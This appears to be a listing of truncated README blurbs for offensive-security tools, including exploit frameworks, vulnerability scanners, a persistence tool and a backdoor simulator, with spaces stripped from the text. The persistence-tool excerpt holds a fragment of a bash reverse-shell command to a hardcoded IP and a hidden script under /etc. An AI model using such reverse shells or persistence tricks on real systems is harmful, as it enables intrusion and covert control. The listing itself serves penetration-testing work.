Windows10PenetrationSuiteToolkitwithinKaliLinuxv5.02024.4.17更新说明:安卓、CTF、逆向、AI、取证、数据库等分类补充了部分实用工具；去除部分长期未更新、使用效果不佳及功能重复的工具；优化扫描器、数据库等部分工具系统资源占用过大问题；重构工具快捷方式，注明详细使用参数及方法，图标美化；系统、组件及工具常规升级更新。系统简介:基于Windo…

希望大家有好的idea,可以提issue,我会尽量实现目前功能fastjson扫描权限绕过扫描未授权检测扫描sql注入检测多层级路由扫描工具调用log4j检测复杂数据提交一键生成nuclei模板使用说明请使用mvncleanpackage进行编译打包,生成的jar包在target/目录下请使用mvncleanpackage进行编译打包,生成的jar包在target/目录下请使用mvncleanpa…

Vulnerabilityaccuratedetectionanddeepexploitframework0x01简介woodpecker-framework是一款漏洞精准检测深度利用框架，只做一件事：精准狙击高危漏洞。针对人群：专业打点人士。目标探测精准检测深度利用荷载生成0x02注意2.1在MacosJDK11.11版本下运行，切换输入法会崩溃这个问题不是woodpecker框架的问题，是该版…

?HackerPermKeeper黑客权限保持者___________|||||||__\||//||__||______||________||__)|___________|'/_______________|__|/_`|/__||//_\'__|___/_\'__|'_`_\|&/dev/tcp/192.168.86.137/34340>&1chmod+x/etc/.111.sh2、添加定…

BackdoorSimOverviewBackdoorSimisaremoteadministrationandmonitoringtooldesignedforeducationalandtestingpurposes.Itconsistsoftwomaincomponents:ControlServerandBackdoorClient.Theservercontrolstheclient,a…

IEyes企业资产快速收集工具本工具主要通过天眼查接口进行快速的资产收集，收集内容包括备案域名、公众号、APP，以及其子公司，投资公司的信息，支持递归深度搜索子公司在查询企业子公司时主要分为4类企业单位场景，除了4以外整体我都简化一并查询中小企业，集团公司，这类公司有自己的子公司，子公司也是我们收集的范围大型厂商，比如腾讯阿里这类，这类公司主要以投资的形式拥有着一大批子公司，投资比例越高越和母公司…

Modern.Native.WebDebuggingProxyformacOS.SupportsiOSandAndroid⚡️Features?NativemacOSapp.WrittenbySwift,Objective-C.PoweredbyAppleSwiftNIOforthehigh-performancenetworkapplication.?FullysupportsAppleChip…

✈️一、工具概述SBSCAN：（spring框架渗透，这一个工具就够了，如果工具对你有用，快点个star?吧）SBSCAN是一款专注于spring框架的渗透测试工具，可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证。最全的敏感路径字典：最全的springboot站点敏感路径字典，帮你全面检测站点是否存在敏感信息泄漏支持指纹检测：检测是否为spr…

SubDomainBruteJava子域名爆破工具描述爆破：现经过优化后，预计31297个域名调整好参数后大概在16秒左右能够跑完，效果大概如下图：已添加子域获取接口：AlienVaultAnubisRapiddnsSiteDossier使用方法：将PortService放到Jar包所在目录下，后执行java-jarJarName，参数项：Usage:[options]Options:*--dom…

nacs事件驱动的扫描器[中文Readme]|[EnglishReadme]✨功能探活服务扫描(常规&非常规端口)poc探测(xray&nuclei格式)数据库等弱口令爆破内网常见漏洞利用⭐️亮点常见组件及常见HTTP请求头的log4j漏洞检测非常规端口的服务扫描和利用(比如2222端口的ssh等等)识别为公网IP时,从fofa检索可用的资产作为扫描的补充(正在写)自动识别简单web页面的输入框，…